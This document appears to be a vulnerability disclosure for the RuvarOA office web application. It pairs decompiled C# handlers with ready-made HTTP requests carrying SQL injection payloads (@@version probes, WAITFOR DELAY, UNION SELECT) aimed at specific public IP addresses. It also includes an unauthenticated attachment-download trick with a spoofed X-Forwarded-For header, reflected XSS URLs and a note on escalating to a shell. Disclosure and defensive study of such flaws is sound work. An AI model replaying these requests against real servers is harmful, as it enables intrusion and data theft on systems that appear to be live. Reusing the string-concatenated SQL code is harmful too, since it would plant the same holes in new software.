if (Validate.isNullOrSpace(text))
{
text = "0";
}
string text2 = ((Page)this).Request.QueryString["idlist"];
if (Validate.isNullOrSpace(text2))
{
text2 = "0";
}
string text3 = ((Page)this).Request.QueryString["dbname"];
if (Validate.isNullOrSpace(text3))
{
text3 = "RuvarOA";
}
string[] array = text2.Split(new char[1] { ',' });
BackUpDB backUpDB = new BackUpDB(text3);
string text4 = "";
for (int i = 0; i < array.Length; i++)
{
if (!Validate.isNullOrSpace(array[i]) && array[i] != "0")
{
DataView dataView = backUpDB.QueryDataView("select top 1 m_content from office_missive_search where office_missive_id in (" + array[i] + ") ");
if (dataView.Count > 0)
{
text4 = ((!(text4 != "")) ? (text4 + "<div class=\"FirstPage\">" + dataView[0]["m_content"].ToString() + "</div>") : (text4 + "<div class=\"NextPage\">" + dataView[0]["m_content"].ToString() + "</div>"));
}
dataView.Dispose();
}
}
((HtmlContainerControl)divContent).InnerHtml = text4;
JS.ScriptStart();
((Page)this).Response.Write("var AutoPrint = '" + text + "'; \n ");
JS.ScriptEnd();
}
}
The direct use of Request.QueryString["idlist"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
WorkFlow/wf_get_fields_approve.aspx
GET /WorkFlow/wf_get_fields_approve.aspx?template_id=@@version HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
function wf_get_fields_approve within the DLL file /RuvarOA/bin/WorkFlow.dll
public class wf_get_fields_approve : Page
{
protected HtmlForm Form1;
protected ListBox ddlFields;
protected void Page_Load(object sender, EventArgs e)
{
//IL_00df: Unknown result type (might be due to invalid IL or missing references)
//IL_00e9: Expected O, but got Unknown
string text = ((Page)this).Request.QueryString["template_id"];
if (Validate.isNullOrSpace(text))
{
text = "0";
}
DataView dataView = SqlHelper.QueryView("select top 1 * from office_missive_template where office_missive_template_id=" + text);
if (dataView.Count > 0)
{
string text2 = dataView[0]["mt_approve_value"].ToString();
string text3 = dataView[0]["mt_approve_text"].ToString();
string[] array = text2.Split(new char[1] { ',' });
string[] array2 = text3.Split(new char[1] { ',' });
for (int i = 0; i < array.Length; i++)
{
if (!Validate.isNullOrSpace(array[i]))
{
((ListControl)ddlFields).Items.Add(new ListItem(array2[i], array[i]));
}
}
}
dataView.Dispose();
}
}
The direct use of Request.QueryString["template_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
WorkFlow/wf_work_form_save.aspx
GET /WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
function wf_work_form_save within the DLL file /RuvarOA/bin/WorkFlow.dll
public class wf_work_form_save : Page
{
protected HtmlForm form1;
protected Literal m_content;
protected void Page_Load(object sender, EventArgs e)
{
string text = ((Page)this).Request.QueryString["office_missive_id"];
string text2 = ((Page)this).Request.QueryString["dbname"];
string text3 = ((Page)this).Request.QueryString["tablename"];
if (Validate.isNullOrSpace(text2))
{
text2 = "RuvarOA";
}
if (Validate.isNullOrSpace(text3))
{
text3 = "office_missive_search";
}
if (Validate.isNullOrSpace(text))
{
text = "0";
}
if (text == "0")
{
((Page)this).Response.End();
}
BackUpDB backUpDB = new BackUpDB(text2);
DataView dataView = backUpDB.QueryDataView("select top 1 m_title,m_content from " + text3 + " where office_missive_id=" + text);
if (dataView.Count > 0)
{
((Page)this).Title = dataView[0]["m_title"].ToString();
m_content.Text = dataView[0]["m_content"].ToString();
}
dataView.Dispose();
}
}
The direct use of Request.QueryString["office_missive_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
WorkPlan/WorkPlanAttachDownLoad.aspx
GET /WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- HTTP/1.1
Host: 121.8.91.35:89
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
function WorkPlanAttachDownLoad within the DLL file /RuvarOA/bin/WorkPlan.dll
public class WorkPlanAttachDownLoad : Page
{
protected void Page_Load(object sender, EventArgs e)
{
string text = ((Page)this).Request.QueryString["sys_file_storage_id"];
string text2 = "";
string text3 = "";
string text4 = "";
text2 = "select top 1 * from workplan_attach where (sys_file_storage_id='" + text + "')order by sys_file_storage_id desc";
if (text2 != "")
{
SqlDataReader val = SqlHelper.ExecuteReader(text2);
while (((DbDataReader)(object)val).Read())
{
text4 = ((DbDataReader)(object)val)["file_type"].ToString();
text3 = ((DbDataReader)(object)val)["file_name"].ToString();
byte[] array = new byte[((DbDataReader)(object)val).GetBytes(12, 0L, (byte[]?)null, 0, int.MaxValue)];
((DbDataReader)(object)val).GetBytes(12, 0L, array, 0, array.Length);
((Control)this).Page.Response.ContentType = text4;
((Control)this).Page.Response.AddHeader("Content-Disposition", "attachment; filename=" + HttpUtility.UrlEncodeUnicode(text3) + ";");
((Control)this).Page.Response.BinaryWrite(array);
}
((DbDataReader)(object)val).Close();
}
}
The direct use of Request.QueryString["sys_file_storage_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
filemanage/file_memo.aspx
GET /filemanage/file_memo.aspx?file_id=@@version HTTP/1.1
Host: 121.33.254.78:88
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close
function file_memo within the DLL file /RuvarOA/bin/filemanage.dll
public class file_memo : Page
{
protected HtmlForm Form1;
protected TextBox txt_file_memo;
protected Button btnConfirm;
protected TextBox txt_file_id;
protected void Page_Load(object sender, EventArgs e)
{
if (!((Page)this).IsPostBack)
{
txt_file_id.Text = ((Page)this).Request.QueryString["file_id"];
if (Validate.isNullOrSpace(txt_file_id.Text))
{
txt_file_id.Text = "0";
}
DataView dataView = SqlHelper.QueryView("select * from info_file where file_id=" + txt_file_id.Text);
if (dataView.Count > 0)
{
txt_file_memo.Text = dataView[0]["file_memo"].ToString();
}
dataView.Dispose();
}
}
The direct use of Request.QueryString["file_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
ContractManage/get_company.aspx
POST /ContractManage/get_company.aspx HTTP/1.1
Host: 119.131.131.101:8000
Content-Length: 527
Cache-Control: max-age=0
Origin: http://119.131.131.101:8000
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux i686) Gecko/20060204 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://119.131.131.101:8000/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NjkyODU1NDAPZBYCAgMPZBYGAgEPEGQPFgFmFgEQBQzpgInmi6nliIbnsbtlZxYBZmQCCQ88KwALAQAPFggeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50Zh4JUGFnZUNvdW50AgEeFV8hRGF0YVNvdXJjZUl0ZW1Db3VudGZkZAILDw8WAh4RUGFnZXJfUmVjb3JkY291bnRmZGRkjBOPpsjzfyKuMGne7EKY2cnc17Zi99ZVNb4cfmiP0Z0%3D&ddl_type=&ddl_field=dw_bh&txt_keyword=11'%3bWAITFOR+DELAY+'0%3a0%3a5'--&btnSearch=%E6%9F%A5%E8%AF%A2&pager_input=1&pager_select=20&txt_row_index=&txt_dw_id=&txt_dw_mc=&txt_dw_bh=&txt_dw_lxr=&txt_dw_dh=
POST /ContractManage/get_company.aspx HTTP/1.1
Host: 119.131.131.101:8000
Content-Length: 1149
Cache-Control: max-age=0
Origin: http://119.131.131.101:8000
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux i686) Gecko/20060204 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://119.131.131.101:8000/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NjkyODU1NDAPZBYCAgMPZBYIAgEPEGQPFgFmFgEQBQzpgInmi6nliIbnsbtlZxYBZmQCCQ88KwALAQAPFggeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50Zh4JUGFnZUNvdW50AgEeFV8hRGF0YVNvdXJjZUl0ZW1Db3VudGZkZAILDw8WBB4WUGFnZXJfQ3VycmVudFBhZ2VJbmRleGYeEVBhZ2VyX1JlY29yZGNvdW50ZmRkAg0PFgIeBFRleHQFATBkZGkRakgZwcKyYwt4sQf48JqdFzMTXVIZFd8gYajJYD8E&ddl_type=&ddl_field=dw_bh&txt_keyword=11'+UNION+ALL+SELECT+CHAR(113)%2bCHAR(106)%2bCHAR(98)%2bCHAR(112)%2bCHAR(113)%2bCHAR(68)%2bCHAR(73)%2bCHAR(66)%2bCHAR(87)%2bCHAR(101)%2bCHAR(105)%2bCHAR(103)%2bCHAR(119)%2bCHAR(82)%2bCHAR(81)%2bCHAR(69)%2bCHAR(118)%2bCHAR(85)%2bCHAR(110)%2bCHAR(87)%2bCHAR(71)%2bCHAR(115)%2bCHAR(112)%2bCHAR(121)%2bCHAR(121)%2bCHAR(101)%2bCHAR(82)%2bCHAR(100)%2bCHAR(81)%2bCHAR(100)%2bCHAR(100)%2bCHAR(116)%2bCHAR(86)%2bCHAR(100)%2bCHAR(73)%2bCHAR(82)%2bCHAR(99)%2bCHAR(110)%2bCHAR(84)%2bCHAR(74)%2bCHAR(105)%2bCHAR(86)%2bCHAR(107)%2bCHAR(100)%2bCHAR(118)%2bCHAR(113)%2bCHAR(122)%2bCHAR(120)%2bCHAR(113)%2bCHAR(113)--+CwAf&btnSearch=%E6%9F%A5%E8%AF%A2&pager_input=1&pager_select=20&txt_row_index=&txt_dw_id=&txt_dw_mc=&txt_dw_bh=&txt_dw_lxr=&txt_dw_dh=
POST /ContractManage/get_company.aspx HTTP/1.1
Host: 119.131.131.101:8000
Content-Length: 581
Cache-Control: max-age=0
Origin: http://119.131.131.101:8000
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux i686) Gecko/20060204 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://119.131.131.101:8000/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NjkyODU1NDAPZBYCAgMPZBYIAgEPEGQPFgFmFgEQBQzpgInmi6nliIbnsbtlZxYBZmQCCQ88KwALAQAPFggeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50Zh4JUGFnZUNvdW50AgEeFV8hRGF0YVNvdXJjZUl0ZW1Db3VudGZkZAILDw8WBB4WUGFnZXJfQ3VycmVudFBhZ2VJbmRleGYeEVBhZ2VyX1JlY29yZGNvdW50ZmRkAg0PFgIeBFRleHQFATBkZGkRakgZwcKyYwt4sQf48JqdFzMTXVIZFd8gYajJYD8E&ddl_type=&ddl_field=dw_bh&txt_keyword=11'+UNION+ALL+SELECT+@@version--+CwAf&btnSearch=%E6%9F%A5%E8%AF%A2&pager_input=1&pager_select=20&txt_row_index=&txt_dw_id=&txt_dw_mc=&txt_dw_bh=&txt_dw_lxr=&txt_dw_dh=
function get_company within the DLL file /RuvarOA/bin/ContractManage.dll
protected TextBox txt_keyword;
{
string text2 = text;
text = text2 + " and " + ((ListControl)ddl_field).SelectedValue + " like '%" + txt_keyword.Text + "%' ";
}
string format = "Exec DataPaging 'view_contract_company','*','id'," + pager.PageSize + "," + pager.CurrentPageIndex.ToString() + ",{0},0,'" + Common.FixQuote(text) + "','id'";
DataView dataView = null;
The direct use of TextBox #id txt_keyword to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
PersonalAffair/worklog_template_show.aspx
GET /PersonalAffair/worklog_template_show.aspx?id=@@version HTTP/1.1
Content-Type: application/json
Host: 121.33.254.78:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
function worklog_template_show within the DLL file /RuvarOA/bin/PersonalAffair.dll
public class worklog_template_show : Page
{
protected HtmlForm Form1;
protected HtmlGenericControl divTitle;
protected HtmlGenericControl divContent;
protected Literal lt_visible;
protected TextBox txt_id;
protected void Page_Load(object sender, EventArgs e)
{
if (!((Page)this).IsPostBack)
{
txt_id.Text = ((Page)this).Request.QueryString["id"];
if (Validate.isNullOrSpace(txt_id.Text))
{
txt_id.Text = "0";
}
DataView dataView = SqlHelper.QueryView("select top 1 * from self_worklog_template where id=" + txt_id.Text);
if (dataView.Count > 0)
{
((HtmlContainerControl)divTitle).InnerHtml = dataView[0]["blog_title"].ToString();
((HtmlContainerControl)divContent).InnerHtml = dataView[0]["blog_content"].ToString();
}
dataView.Dispose();
}
}
}
The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
ProjectManage/pm_gatt_inc.aspx
GET /ProjectManage/pm_gatt_inc.aspx?project_id=@@version HTTP/1.1
Host: 112.74.79.113:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
function pm_gatt_inc within the DLL file /RuvarOA/bin/ProjectManage.dll
public class pm_gatt_inc : Page
{
protected HtmlForm form1;
protected Literal lt_gatt_script;
protected TextBox txt_project_id;
protected void Page_Load(object sender, EventArgs e)
{
if (!((Page)this).IsPostBack)
{
txt_project_id.Text = ((Page)this).Request.QueryString["project_id"];
lt_gatt_script.Text = outProject();
}
}
private string outProject()
{
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.Append("<script language=\"javascript\">\n");
stringBuilder.Append(" function createChartControl(htmlDiv1){ \n ");
DataView dataView = SqlHelper.QueryView("select * from project_info where id=" + txt_project_id.Text);
if (dataView.Count > 0)
{
stringBuilder.Append("var project" + txt_project_id.Text + " = new GanttProjectInfo(" + txt_project_id.Text + ", \"" + dataView[0]["pi_title"].ToString() + "\", new Date(" + DateTime.Parse(dataView[0]["pi_plan_bgdate"].ToString()).ToString("yyyy,M-1,d") + "));\n");
stringBuilder.Append(outputTask("0"));
}
dataView = SqlHelper.QueryView("select * from project_task_info where project_id=" + txt_project_id.Text + " and task_parentid<>0 and task_level>1 order by task_id asc");
for (int i = 0; i < dataView.Count; i++)
The direct use of Request.QueryString["project_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
WorkFlow/OfficeFileDownload.aspx
GET /WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0-- HTTP/1.1
Host: 112.74.79.113:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
function OfficeFileDownload within the DLL file /RuvarOA/bin/WorkFlow.dll
public class OfficeFileDownload : Page
{
protected void Page_Load(object sender, EventArgs e)
{
string text = ((Page)this).Request.QueryString["filename"];
string sQLString = "SELECT * FROM wf_office_file WHERE wordfile='" + text + "' ";
DataView dataView = SqlHelper.QueryView(sQLString);
if (dataView.Count > 0)
{
byte[] array = (byte[])dataView[0]["filedata"];
((Page)this).Response.Clear();
((Page)this).Response.BinaryWrite(array);
}
else
The direct use of Request.QueryString["filename"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
WorkFlow/wf_work_stat_setting.aspx
GET /WorkFlow/wf_work_stat_setting.aspx?template_id=@@version HTTP/1.1
Host: 8.129.124.44:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
function wf_work_stat_setting within the DLL file /RuvarOA/bin/WorkFlow.dll
public class wf_work_stat_setting : Page
{
protected HtmlHead Head1;
protected HtmlForm form1;
protected HtmlInputRadioButton statGroup_0;
protected HtmlInputRadioButton statGroup_1;
protected HtmlInputRadioButton statWay_0;
protected HtmlInputRadioButton statWay_1;
protected HtmlTable tblFields;
protected ListBox lbStatFieldS;
protected ListBox lbStatFieldT;
protected TextBox txt_template_id;
protected void Page_Load(object sender, EventArgs e)
{
if (!((Page)this).IsPostBack)
{
txt_template_id.Text = ((Page)this).Request.QueryString["template_id"];
if (Validate.isNullOrSpace(txt_template_id.Text))
{
txt_template_id.Text = "0";
}
string text = ((Page)this).Request.QueryString["statWay"];
string defaultField = ((Page)this).Request.QueryString["statField"];
string text2 = ((Page)this).Request.QueryString["statGroup"];
if (text2 == "Dept")
{
statGroup_1.Checked = false;
statGroup_0.Checked = true;
}
else
{
statGroup_0.Checked = false;
statGroup_1.Checked = true;
}
if (text == "Sum")
{
statWay_0.Checked = false;
statWay_1.Checked = true;
((HtmlControl)tblFields).Attributes["style"] = "display:";
}
else
{
statWay_1.Checked = false;
statWay_0.Checked = true;
((HtmlControl)tblFields).Attributes["style"] = "display:none";
}
InitField(defaultField);
}
}
private void InitField(string defaultField)
{
//IL_013f: Unknown result type (might be due to invalid IL or missing references)
//IL_0149: Expected O, but got Unknown
//IL_00f9: Unknown result type (might be due to invalid IL or missing references)
//IL_0103: Expected O, but got Unknown
((ListControl)lbStatFieldS).Items.Clear();
((ListControl)lbStatFieldT).Items.Clear();
string sQLString = "SELECT f_field_name,f_field_caption,f_field_type_value from office_missive_template_field where f_template_id=" + txt_template_id.Text + " order by f_field_order asc,office_field_id asc ";
DataView dataView = SqlHelper.QueryView(sQLString);
The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
WorkFlow/wf_office_file_history_show.aspx
GET /WorkFlow/wf_office_file_history_show.aspx?id=1%27%20and%20%28@@version%29%3E0-- HTTP/1.1
Host: 58.63.71.222:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
function wf_office_file_history_show within the DLL file /RuvarOA/bin/WorkFlow.dll
public class wf_office_file_history_show : Page
{
protected void Page_Load(object sender, EventArgs e)
{
string text = ((Page)this).Request.QueryString["id"];
string strSQL = "select * from wf_office_file_history where id='" + text + "'";
SqlDataReader val = SqlHelper.ExecuteReader(strSQL);
The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
WebUtility/SearchCondiction.aspx
GET /WebUtility/SearchCondiction.aspx?PageID=1%27&type=1 HTTP/1.1
Host: 58.63.71.222:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
function SearchCondiction within the DLL file /RuvarOA/bin/WebUtility.dll
public class SearchCondiction : Page
{
protected HtmlHead Head1;
protected HtmlForm form1;
protected HtmlTable tblSearch;
protected Button btnConfirm;
protected void Page_Load(object sender, EventArgs e)
{
if (!((Page)this).IsPostBack)
{
string pageID = ((Page)this).Request.QueryString["PageID"];
string text = ((Page)this).Request.QueryString["type"];
if (text == "2")
{
OutPutTwo(pageID);
}
else
{
OutPutOne(pageID);
}
}
}
private void OutPutOne(string PageID)
{
//IL_0035: Unknown result type (might be due to invalid IL or missing references)
//IL_003b: Expected O, but got Unknown
//IL_003b: Unknown result type (might be due to invalid IL or missing references)
//IL_0041: Expected O, but got Unknown
//IL_00bd: Unknown result type (might be due to invalid IL or missing references)
//IL_00c3: Expected O, but got Unknown
DataView dataView = SqlHelper.QueryView("select * from sys_pagelist_search where page_id=" + PageID + " order by field_order ");
The direct use of Request.QueryString["pageID"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
WebUtility/get_find_condiction.aspx
GET /WebUtility/get_find_condiction.aspx?PageID=1%27&type=1 HTTP/1.1
Host: 58.63.71.222:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
function get_find_condiction within the DLL file /RuvarOA/bin/WebUtility.dll
namespace WebUtility;
public class get_find_condiction : Page
{
protected HtmlHead Head1;
protected HtmlForm form1;
protected HtmlTable tblSearch;
protected Button btnConfirm;
protected void Page_Load(object sender, EventArgs e)
{
if (!((Page)this).IsPostBack)
{
string pageID = ((Page)this).Request.QueryString["PageID"];
string text = ((Page)this).Request.QueryString["type"];
if (text == "2")
{
OutPutTwo(pageID);
}
else
{
OutPutOne(pageID);
}
}
}
......
private void OutPutOne(string PageID)
{
//IL_0035: Unknown result type (might be due to invalid IL or missing references)
//IL_003b: Expected O, but got Unknown
//IL_003b: Unknown result type (might be due to invalid IL or missing references)
//IL_0041: Expected O, but got Unknown
//IL_00bd: Unknown result type (might be due to invalid IL or missing references)
//IL_00c3: Expected O, but got Unknown
DataView dataView = SqlHelper.QueryView("select * from view_sys_pagelist_field where page_id=" + PageID + " and u_id=0 and field_search=1 order by field_order ");
if (dataView.Count > 0)
......
private void OutPutTwo(string PageID)
{
//IL_0038: Unknown result type (might be due to invalid IL or missing references)
//IL_003e: Expected O, but got Unknown
//IL_006c: Unknown result type (might be due to invalid IL or missing references)
//IL_0072: Expected O, but got Unknown
//IL_00d7: Unknown result type (might be due to invalid IL or missing references)
//IL_00dd: Expected O, but got Unknown
//IL_0305: Unknown result type (might be due to invalid IL or missing references)
//IL_030b: Expected O, but got Unknown
//IL_0370: Unknown result type (might be due to invalid IL or missing references)
//IL_0376: Expected O, but got Unknown
//IL_017f: Unknown result type (might be due to invalid IL or missing references)
//IL_0185: Expected O, but got Unknown
//IL_01e2: Unknown result type (might be due to invalid IL or missing references)
//IL_01e8: Expected O, but got Unknown
//IL_0276: Unknown result type (might be due to invalid IL or missing references)
//IL_027c: Expected O, but got Unknown
//IL_02ab: Unknown result type (might be due to invalid IL or missing references)
//IL_02b1: Expected O, but got Unknown
//IL_04e5: Unknown result type (might be due to invalid IL or missing references)
//IL_04eb: Expected O, but got Unknown
DataView dataView = SqlHelper.QueryView("select * from view_sys_pagelist_field where page_id=" + PageID + " and u_id=0 and field_search=1 order by field_order ");
int num = 0;
if (dataView.Count > 0)
The direct use of Request.QueryString["PageID"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
include/get_dict.aspx
GET /include/get_dict.aspx?bi_value=1&bt_id=1%29+AND+1248+IN+%28SELECT+@@version%29+AND+%282558%3D2558&bt_name=1&bi_name=1 HTTP/1.1
Host: 183.6.103.52:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
function get_dict within the DLL file /RuvarOA/bin/include.dll
public class get_dict : Page
{
protected HtmlForm form1;
protected GridView dataGrid;
protected Literal lt_bt_id;
protected Literal lt_bi_name;
protected Literal lt_bi_id;
protected void Page_Load(object sender, EventArgs e)
{
lt_bt_id.Text = ((Page)this).Request.QueryString["bt_id"];
string text = ((Page)this).Request.QueryString["bt_name"];
lt_bi_id.Text = ((Page)this).Request.QueryString["bi_id"];
lt_bi_name.Text = ((Page)this).Request.QueryString["bi_name"];
string text2 = "";
text2 = ((!Validate.isNullOrSpace(lt_bt_id.Text)) ? ("select sys_baseinfo.sys_baseinfo_id,sys_baseinfo.bi_name,sys_baseinfo_type.bt_name,sys_baseinfo.sys_basetype_id from sys_baseinfo inner join sys_baseinfo_type on sys_baseinfo.sys_basetype_id=sys_baseinfo_type.sys_basetype_id where sys_baseinfo.sys_basetype_id in (" + lt_bt_id.Text + ") order by bi_order asc ") : ("select sys_baseinfo.sys_baseinfo_id,sys_baseinfo.bi_name,sys_baseinfo_type.bt_name,sys_baseinfo.sys_basetype_id from sys_baseinfo inner join sys_baseinfo_type on sys_baseinfo.sys_basetype_id=sys_baseinfo_type.sys_basetype_id where bt_name='" + Common.FixQuote(text) + "' order by bi_order asc "));
DataView dataView = SqlHelper.QueryView(text2);
The direct use of Request.QueryString["bt_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.
Error messages that reveal the physical path of the website can be a security risk, especially if there are other vulnerabilities present, such as SQL injection. If an attacker can exploit an SQL injection vulnerability to write files to the server, they might be able to "get shell" access, which means gaining unauthorized access to the server's command line interface.
WorkFlow/OfficeFileUpdate.aspx
POST /WorkFlow/OfficeFileUpdate.aspx HTTP/1.1
Host: 112.74.79.113:8000
Content-Length: 144
Cache-Control: max-age=0
Origin: http://112.74.79.113:8000
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://112.74.79.113:8000/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close
__VIEWSTATE=%2FwEPDwUKLTUwNDQwMTA1MGRkLNtCIVKbdmdjLp4E6Em829B9XPLlIL9eHNh9igI5cNQ%3D&Button1=%E5%BC%80%E5%A7%8B%E6%9B%B4%E6%96%B0&txt_file_name=
asset/asset_file_search_left.aspx
GET /asset/asset_file_search_left.aspx HTTP/1.1
Host: 112.74.79.113:8000
Mobile/LHMail/AttachDown.aspx
GET /Mobile/LHMail/AttachDown.aspx?contentid=1 HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Iterating over contentid allows for the downloading of corresponding file types. The same issue exists with email_attach_id.
http://112.74.79.113:8000/SysManage/emailset_outside.aspx?PageTitle=%E7%B3%BB%E7%BB%9F%E5%A4%96%E5%8F%91%E9%82%AE%E7%AE%B1%3Cimg/src/onerror=prompt(8)%3E
http://112.74.79.113:8000/WebUtility/common_new_top.aspx?template_id=1&template_name=testssss%3Cimg/src/onerror=prompt(8)%3E
http://112.74.79.113:8000/WebUtility/common_show.aspx?template_id=1&template_name=testssss%3Cimg/src/onerror=prompt(8)%3E
http://112.74.79.113:8000/WebUtility/common_show_top.aspx?template_id=1&template_name=testssss%3Cimg/src/onerror=prompt(8)%3E
http://112.74.79.113:8000/WebUtility/common_deal.aspx?template_id=1&template_name=testssss%3Cimg/src/onerror=prompt(8)%3E
